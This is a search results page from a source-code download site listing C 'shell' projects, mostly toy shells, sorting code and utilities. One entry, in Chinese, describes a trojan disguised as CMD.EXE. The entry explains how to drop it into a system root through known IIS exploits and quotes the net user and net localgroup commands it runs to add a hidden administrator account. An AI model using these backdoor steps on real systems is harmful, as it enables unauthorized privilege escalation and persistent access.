Hot Search : Source embeded web remote control p2p game More...
Location : Home Search - C SHELL
Search - C SHELL - List
DL : 0
在LINUX下,实现一个简单的模仿SHELL的小程序,供初学者交流
Date : 2011-05-31 Size : 69.35kb User : gepeiwei@qq.com

你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code
Date : 2025-12-23 Size : 18kb User : 姜振

用c实现的命令行格式的外壳-achieve with the command line format shell
Date : 2025-12-23 Size : 3kb User :

DL : 0
c++经典小程序。包括河内塔 费式数列 巴斯卡三角形 三色棋 老鼠走迷官(一) 老鼠走迷官(二) 骑士走棋盘 八个皇后 八枚银币 生命游戏 字串核对 双色、三色河内塔 背包问题(Knapsack Problem) 数、运算 蒙地卡罗法求 PI Eratosthenes筛选求质数 超长整数运算(大数运算) 长 PI 最大公因数、最小公倍数、因式分解 完美数 阿姆斯壮数 最大访客数 中序式转后序式(前序式) 后序式的运算 关于赌博 洗扑克牌(乱数排列) Craps赌博游戏 约瑟夫问题(Josephus Problem) 集合问题 排列组合 格雷码(Gray Code) 产生可能的集合 m元素集合的n个元素子集 数字拆解 排序 得分排行 选择、插入、气泡排序 Shell 排序法 - 改良的插入排序 Shaker 排序法 - 改良的气泡排序 Heap 排序法 - 改良的选择排序 快速排序法等 -err
Date : 2025-12-23 Size : 440kb User : sunny

DL : 0
侦壳工具.在反编译前使用 -Shell detection tools. Decompile before in
Date : 2025-12-23 Size : 218kb User : 小心

DL : 0
自己实现的简单的shell 自己实现的简单的she-Their implementation of the simple shell
Date : 2025-12-23 Size : 1kb User : beyond

gtk_server的源代码,可以使用你能不写C语言程序就访问gtk+库。支持shell, perl, python, vbscript等等脚本语言-gtk_server source code, you can use you can not write C language program on the visit to gtk+ library. Support the shell, perl, python, vbscript scripting language and so on
Date : 2025-12-23 Size : 327kb User : ldsfjlfjl

仿真计算器的通用C程序 读者在使用WPS及Pctools等工具软件时,可方便地弹出计算器窗口来仿真使用计算器的功能。也许很多软件作者也设想在自已开发的软件中为用户提供这种计算器仿真功能,如读者在开发自已的MIS系统或表处理软件及文本检索软件等应用软件时,也应该具有一个热键弹出的计算器窗口,为用户提供仿真计算器的功能,从而改善应用软件的用户友好性。笔者介绍一个可供C语言及各种计算机语言调用的通用计算器仿真程序。该程序用MSC6.0语言编写,在DOSS.O环境下通过 源程序清单附后,各种子函数及语句的功能程序注释比较详细。可在各种汉字操作系统下供软件作者调用。-Readers in the use of tools such as WPS and Pctools software, pop-up calculator can be easily used to simulate the window function calculator. Perhaps a lot of software authors developed the idea in their own software to provide users with such a calculator simulation functions, such as their own readers in the development of MIS systems or table-processing software and text retrieval software and other applications, it should have a hotkey shell window of the calculator, the calculator provides users with the function of simulation to improve the application of user-friendly. I introduced for the C language and a variety of general-purpose computer language called simulation program calculator. MSC6.0 the program language used in the environment through DOSS.O source attached list, all kinds of Functions and procedures for the Notes feature statement in more detail. Chinese characters in a variety of operating system calls for the software s author.
Date : 2025-12-23 Size : 241kb User : 王成

Windows users take advantage of shell extensions on the desktop every single day, but understanding what they are and how to program with them can be tricky and, until now anyway, usually required the use of Visual C++. Filled with expert knowledge of the underlying Windows shell COM objects, Visual Basic Shell Programming is all that you need to write shell-enabled applications that look more professional, as well as rival the functionality of programs that are written in C++.
Date : 2025-12-23 Size : 1.83mb User : Miley Zhang

DL : 0
一个C++编写的LINUX SHELL,支持的命令有cat cd rm mkdir ls pwd pid mv cp,"exit"命令用于退出- The program is to execute some common commands of Linux,available commands are: cat cd rm mkdir ls pwd pid mv cp,same function as the standard linux shell command.There’s also a command “exit” to let the user exit the program.The programe also shows how long did the last executed command take(in second).
Date : 2025-12-23 Size : 1kb User : 王跃辉

本源代码利用C++语言实现了希尔排序的算法,对数据结构课程有帮助。-Origin of the code using C++ language implementation of the Shell sort algorithm, for data structure courses helpful.
Date : 2025-12-23 Size : 1kb User :

AStyle是开源的命令行模式的编程语言(支持 C,C++, C# , Java) 自动格式化工具。 由于参数繁杂,而且没有图形操作界面,操作起来并不是很方便。 所以我用VB写了个外壳程序,实现了文件拖动自动格式化功能。可以自定义格式化参数。十分方便! 附源码供大家研究!欢迎大家下载使用! -AStyle is open source, command-line mode of programming languages (supporting C, C++, C#, Java) automatic formatting tools. As the parameters of complex, and no graphical user interface, the operation was not always easy. So I wrote a shell with a VB program, drag the file to achieve automatic formatting feature. Can customize the format parameter. Very convenient! Attached source for everyone to! Welcome to download!
Date : 2025-12-23 Size : 158kb User : 纪翔

DL : 0
该文件中有有C语言实现的快速排序和几个版本的希尔排序,希望能对各位有帮助。-The file has a C language implementation of quick sort and several versions of the Shell sort, hoping to be helpful.
Date : 2025-12-23 Size : 8kb User : 叶紫

DL : 0
using C to operate she-using C to operate shell
Date : 2025-12-23 Size : 1kb User : Sky

DL : 0
通过C语言实现的仿Linux虚拟目录管理系统,有保存功能-Save function by the C language imitation Linux virtual directory management system
Date : 2025-12-23 Size : 1.05mb User : Juangshen

DL : 0
使用C语言编写的简单的shell程序,简单实现了shell命令行的功能-use C language to write the shell program
Date : 2025-12-23 Size : 11.32mb User : 陈佳涛

8_02892410142001_0 C.zip Winzip 8.0 Clone Shell ( 15 Complete ) -8_02892410142001_0 C.zip Winzip 8.0 Clone Shell ( 15 Complete )
Date : 2025-12-23 Size : 53kb User : singyanjun

DL : 0
能在游戏中玩射击游戏能够在游戏中尽情的打野怪升级等。。。。。(Can play shooting games in the game, can enjoy the game in the wild monster upgrade, etc......)
Date : 2025-12-23 Size : 5kb User : 小赵.

DL : 0
shell c for linux......
Date : 2025-12-23 Size : 542kb User : atef7

DL : 0
a basic UNIX shell in C that reads and processes commands
Date : 2025-12-23 Size : 3kb User : hlmtxx
« 12 »
CodeBus is one of the largest source code repositories on the Internet!
Contact us :
1999-2046 CodeBus All Rights Reserved.